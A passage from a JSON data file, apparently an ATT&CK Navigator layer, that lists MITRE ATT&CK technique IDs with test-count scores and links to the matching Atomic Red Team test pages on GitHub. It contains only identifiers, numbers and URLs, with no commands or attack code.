Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":31,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":59,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":76,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View 
